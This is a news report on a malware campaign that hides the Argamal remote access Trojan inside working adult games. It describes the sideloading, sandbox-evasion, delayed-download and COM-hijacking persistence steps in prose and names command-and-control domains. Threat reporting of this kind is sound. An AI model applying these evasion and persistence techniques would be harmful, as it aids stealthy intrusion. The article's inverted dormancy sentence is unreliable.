Hackers Hide Argamal Malware Inside Fully Functional Adult Games

Cybersecurity researchers at Kaspersky have uncovered a malware campaign that uses adult-themed video games to infect users with a powerful remote access Trojan known as Argamal. First detected in April 2026, the campaign targets people downloading hentai games from adult gaming websites, file-sharing services, and torrent platforms.

Unlike typical malware scams that distribute broken or non-functional files, these malicious downloads contain fully working games built on popular engines such as RenPy and RPG Maker. The games launch and operate normally, making it difficult for victims to realize that their systems have been compromised.

How the Infection Process Works

The malicious game installers are distributed through adult game websites, file-sharing services such as PixelDrain, and torrent trackers including AniRena.

Once a game is launched, the installer loads a modified FFmpeg DLL file along with a file named natives2_blob.bin. The altered library quietly executes in memory and launches a PowerShell script without displaying any warnings to the user.

Before proceeding, the script checks the system for analysis and monitoring tools such as Sandboxie and Procmon64. If no security monitoring tools are detected, the malware remains dormant to avoid raising suspicion.

Three days after infection, a scheduled task activates and uses bitsadmin.exe to download an encrypted file called zaesdl.dat from GitHub. The file is then decrypted using AES-CBC encryption and transformed into the primary Argamal Trojan component.

Persistence Through COM Hijacking

To maintain long-term access, Argamal employs a technique known as COM hijacking. The malware modifies Windows registry entries associated with the legitimate Windows Color System Calibration Loader.

Because this Windows component runs automatically whenever a user signs in, the malware is launched during every login session, ensuring persistent access even after system restarts.

Capabilities of Argamal

Once active, Argamal establishes communication with attacker-controlled servers by sending regular UDP heartbeat messages. Researchers identified command-and-control domains including asper1.freeddns.org and Winst0.kozow.com.

After gaining control of the infected system, attackers can perform a wide range of malicious activities, including:

• Stealing files and sensitive documents
• Reading private messages and chats
• Collecting financial information
• Taking screenshots of user activity
• Replacing cryptocurrency wallet addresses
• Streaming live video from the infected device
• Executing remote commands

These capabilities effectively give cybercriminals complete remote control over compromised systems.

Growing Threat to Gamers

The campaign highlights an increasingly sophisticated trend in malware distribution, where attackers hide malicious code inside legitimate and fully functional software. By embedding malware in working games, cybercriminals reduce suspicion and increase the likelihood that victims will unknowingly install and run the infection.

Security experts advise users to avoid downloading software from untrusted websites, verify file sources before installation, and maintain updated security software to help detect emerging threats such as Argamal.